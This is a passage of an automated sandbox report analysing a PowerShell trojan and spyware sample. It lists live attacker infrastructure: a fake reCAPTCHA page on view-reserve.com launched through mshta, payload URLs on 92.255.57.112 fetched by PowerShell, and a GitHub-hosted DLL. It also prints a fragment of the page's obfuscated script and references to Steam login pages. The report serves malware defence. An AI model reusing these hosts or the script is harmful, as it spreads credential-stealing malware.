                                                                                                    		high
                                                                                                    http://store.steampowered.com/subscriber_agreement/RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://view-reserve.com/recaptcha-verify.htmlAPPTmshta.exe, 00000003.00000002.58303252046.00000248D9AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://recaptcha.net/recaptcha/;RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.protware.com/mshta.exe, 00000003.00000003.58276554563.00000250DCD93000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58275820747.00000250DCD85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58307053628.00000250DCD96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283494904.00000250DCD95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58278705202.00000250DCD85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://view-reserve.com/recaptcha-verify.htmlC:mshta.exe, 00000003.00000002.58305312624.00000250DC660000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58302581442.00000248D98F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://view-reserve.com/mshta.exe, 00000003.00000003.58280651620.00000248D9998000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287185983.00000248D99A3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58302980909.00000248D99A4000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://view-reserve.com/recaptcha-verify.htmlYp?6mshta.exe, 00000003.00000002.58302794613.00000248D9936000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58280651620.00000248D9933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://92.255.57.112/1/1.pngXzipowershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://92.255.57.112/1/3.pngXzipowershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://medal.tvRegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://broadcast.st.dl.eccdnx.comRegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://stackoverflow.com/q/11564914/23354;RegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://contoso.com/powershell.exe, 00000008.00000002.58308550972.000001998150D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://view-reserve.com/recaptcha-verify.htmlZemshta.exe, 00000003.00000002.58302661231.00000248D9925000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287597229.00000248D9924000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.58260917690.000002A3501FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287043720.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58305312624.00000250DC675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283273648.00000250DC673000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58382068499.0000015EAAC2F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58448102834.0000025BAFE64000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58457730531.00000199FF448000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.59532094818.00000000053E0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://login.steampowered.com/RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://store.steampowered.com/legal/RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.protware.com/7mshta.exe, 00000003.00000003.58276554563.00000250DCD93000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58275820747.00000250DCD85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.58307053628.00000250DCD96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58283494904.00000250DCD95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58278705202.00000250DCD85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://crl.comodo=RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://view-reserve.com/recaptcha-verify.htmlhttps://view-reserve.com/recaptcha-verify.htmlmshta.exe, 00000003.00000003.58288335780.00000250DC785000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.58302816703.0000015E93DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58363019340.0000015EA2928000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B98D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58417681738.0000025BA7B39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58415482636.000001999007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998150D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dllRegSvcs.exe, 0000000C.00000002.59499668768.0000000002A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://recaptcha.netRegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.microsoft.$Dpowershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://pesterbdd.com/images/Pester.pngXzipowershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://store.steampowered.com/RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.58328591615.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://steamcommunity.comRegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://127.0.0.1:27060RegSvcs.exe, 0000000E.00000002.58328295441.0000000000AA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://view-reserve.com/recaptcha-verify.htmlbej6mshta.exe, 00000003.00000002.58302661231.00000248D9925000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.58287597229.00000248D9924000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegSvcs.exe, 0000000E.00000002.58326106471.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlXzipowershell.exe, 00000004.00000002.58302816703.0000015E92ADA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97CEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.000001998022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high

                                                                                                                                    World Map of Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public IPs

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    92.255.57.120
                                                                                                                                    		view-reserve.comRussian Federation
                                                                                                                                    		42253TELSPRUtrue
                                                                                                                                    92.255.57.112
                                                                                                                                    		unknownRussian Federation
                                                                                                                                    		42253TELSPRUtrue
                                                                                                                                    23.47.27.74
                                                                                                                                    		steamcommunity.comUnited States
                                                                                                                                    		16625AKAMAI-ASUSfalse

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                    Analysis ID:1591695
                                                                                                                                    Start date and time:2025-01-15 10:16:26 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 8m 43s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                    Run name:Suspected VM Detection
                                                                                                                                    Number of analysed new started processes analysed:15
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:00.ps1
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winPS1@23/13@11/3
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 37.5%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 78%
                                                                                                                                    • Number of executed functions: 122
                                                                                                                                    • Number of non-executed functions: 12
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .ps1

                                                                                                                                    Warnings

                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                    • Execution Graph export aborted for target RegSvcs.exe, PID 9072 because it is empty
                                                                                                                                    • Execution Graph export aborted for target mshta.exe, PID 6112 because there are no executed function
                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6260 because it is empty
                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 8332 because it is empty
                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 8460 because it is empty
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    04:18:36API Interceptor2x Sleep call for process: mshta.exe modified
                                                                                                                                    04:18:37API Interceptor65x Sleep call for process: powershell.exe modified
                                                                                                                                    04:18:40API Interceptor3523557x Sleep call for process: RegSvcs.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    92.255.57.11292.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                      92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                        92.255.57_1.112.ps1Get hashmaliciousXWormBrowse
                                                                                                                                          book_lumm2.dat.exeGet hashmaliciousXWormBrowse
                                                                                                                                            23.47.27.74file.exeGet hashmaliciousVidarBrowse
                                                                                                                                              https://steamfiller.ru/Get hashmaliciousUnknownBrowse
                                                                                                                                                SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                                                                  i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                    yU3icg18lq.exeGet hashmaliciousVidarBrowse

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      steamcommunity.com92.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.102.49.254
                                                                                                                                                      https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.102.49.254
                                                                                                                                                      62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.102.49.254
                                                                                                                                                      lumma1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.102.49.254
                                                                                                                                                      random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.102.49.254
                                                                                                                                                      yTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.102.49.254
                                                                                                                                                      XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.102.49.254
                                                                                                                                                      k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.102.49.254
                                                                                                                                                      G7T8lHJWWM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.102.49.254

                                                                                                                                                      ASNs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      AKAMAI-ASUS92.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.102.49.254
                                                                                                                                                      mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 23.54.60.125
                                                                                                                                                      EXTERNAL Your company's credit limit has changed!.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 184.28.89.29
                                                                                                                                                      https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.102.49.254
                                                                                                                                                      https://www.giselabravo.com/lblogin/loginsGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.102.53.18
                                                                                                                                                      Eastern Contractors Corporation Contract and submittal document.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 2.19.126.97
                                                                                                                                                      download.exeGet hashmaliciousBabuk, MimikatzBrowse
                                                                                                                                                      • 173.222.162.32
                                                                                                                                                      mlfk8sYaiy.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                      • 172.230.50.2
                                                                                                                                                      XML-702.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                      • 2.23.77.188
                                                                                                                                                      TELSPRU92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                      • 92.255.57.112
                                                                                                                                                      92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                      • 92.255.57.112
                                                                                                                                                      WZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.155
                                                                                                                                                      WZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.155
                                                                                                                                                      2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.155
                                                                                                                                                      2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.155
                                                                                                                                                      92.255.57_1.112.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                      • 92.255.57.112
                                                                                                                                                      book_lumm2.dat.exeGet hashmaliciousXWormBrowse
                                                                                                                                                      • 92.255.57.112
                                                                                                                                                      http://92.255.57.155/1/1.pngGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.155
                                                                                                                                                      TELSPRU92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                      • 92.255.57.112
                                                                                                                                                      92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                      • 92.255.57.112
                                                                                                                                                      WZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.155
                                                                                                                                                      WZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.155
                                                                                                                                                      2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.155
                                                                                                                                                      2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.155
                                                                                                                                                      92.255.57_1.112.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                      • 92.255.57.112
                                                                                                                                                      book_lumm2.dat.exeGet hashmaliciousXWormBrowse
                                                                                                                                                      • 92.255.57.112
                                                                                                                                                      http://92.255.57.155/1/1.pngGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.155

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1138745635-72645747.116.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 23.47.27.74
                                                                                                                                                      92.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                      • 23.47.27.74
                                                                                                                                                      2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 23.47.27.74
                                                                                                                                                      62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                      • 23.47.27.74
                                                                                                                                                      87.247.158.212.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                      • 23.47.27.74
                                                                                                                                                      lumma_phothockey.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 23.47.27.74
                                                                                                                                                      mWAik6b.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                      • 23.47.27.74
                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                      • 92.255.57.120
                                                                                                                                                      138745635-72645747.116.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.120
                                                                                                                                                      2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.120
                                                                                                                                                      regsvr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.120
                                                                                                                                                      0dsIoO7xjt.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.120
                                                                                                                                                      inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                      • 92.255.57.120
                                                                                                                                                      1KaTo6P18Z.docGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.120
                                                                                                                                                      5UnAIdF7m2.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 92.255.57.120
                                                                                                                                                      x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                      • 92.255.57.120

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):42
                                                                                                                                                      Entropy (8bit):4.0050635535766075
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                      MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                      SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                      SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                      SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\recaptcha-verify[1].htm

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):31911
                                                                                                                                                      Entropy (8bit):6.7549335931824395
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:Sbspoo/iiX2xPYqDKPbrDPeyacIk6hhVfb:S43/iiXpqDKCVnhhBb
                                                                                                                                                      MD5:D91B5DE3C5C867DB8A2EC4569AE55D5C
                                                                                                                                                      SHA1:B9CCDC1E0E8F124183A96AC6FD9025B698D08865
                                                                                                                                                      SHA-256:F55BA11EEB1D1D2784304DC96361A81701318F0864497950A28CABD1F8B51108
                                                                                                                                                      SHA-512:791FB337257F84C26A8D5424A5886183A477517889921C3309A8231063A2B67575B7D8A27DF2009107D8A149EAF5B67A427C41C5856EA8FE192740B70B05A58B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>var _0x2455=["\x64\x6F\x63\x75\x6D\x65\x6E\x74\x4D\x6F\x64\x65","\x61\x6C\x6C"];l1l= document[_0x2455[0]]|| document[_0x2455[1]];var c6efa=true;ll1=document.layers;lll=window.sidebar;c6efa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6efa|=lII;zLP=location.protocol+'0FD';x3UIcOiX8Zj='e7WgO75waI76';</script><script>xwq474P=new Array();xwq474P[0]='%63%38A%32oS\111b%35\166\155%36';c7hMs5q=new Array();c7hMs5q[0]='.\r.\n.<.h.t.m.l. .x~..n.s.=."~..t.p.:././.w~....w.3...o.r.g./.1.9~../.x~.~..".>~zd~..e.a.d.>.<

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):64
                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:@...e...........................................................

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11tryw12.wuq.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_doegegr4.itl.ps1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prhfcrqx.cor.psm1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q02jfbwq.zvh.ps1

